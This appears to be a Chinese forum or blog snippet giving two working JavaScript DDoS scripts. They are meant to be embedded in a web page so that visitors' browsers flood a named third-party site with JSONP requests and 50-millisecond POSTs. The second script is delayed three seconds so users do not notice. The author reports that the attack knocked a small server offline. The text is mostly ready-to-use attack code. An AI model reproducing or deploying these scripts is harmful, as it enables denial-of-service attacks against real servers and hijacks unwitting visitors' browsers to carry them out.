代码1:
<!--代码开始--> <script src="http://lib.sinaapp.com/js/jquery/1.9.1/jquery-1.9.1.min.js"></script> <script> var index=0; function test(){ $.ajax({ url:"http://www.i9a.cn/", dataType:"jsonp", success:function(data){ console.log(data); } }); $("#test").html(index++); } for(var i=0; i<10; i++){ setInterval("test()", 100); } </script> <!--代码结束-->
代码2:
<!--代码开始--> <script type="text/javascript"> var t_postdata='id=datadatadatadatadata';//数据越大效果越好。 var t_url='http://www.i9a.cn/computer/index.asp'; function c_xmlHttp() { if(window.ActiveXObject) { xmlHttp=new ActiveXObject('Microsoft.XMLHTTP'); } else if(window.XMLHttpRequest) { xmlHttp=new XMLHttpRequest(); } return xmlHttp; } function post_send() { var xmlHttp=c_xmlHttp(); xmlHttp.open("POST",t_url,true); xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlHttp.send(t_postdata); r_send(); } function r_send() { setTimeout("post_send()", 50);//50毫秒一次 } if(!+[1,])//IE下不执行。 {var fghj=1;} else {setTimeout("post_send()", 3000);}//访问网站3秒后再执行,这样用户就毫无感觉。 </script> <!--代码结束-->
我测试使用流量宝刷流量2000,1G1核1M网络中断1次。有人说太鸡肋,但是就是因为js ddos 百度曾经被利用攻击第三方服务器。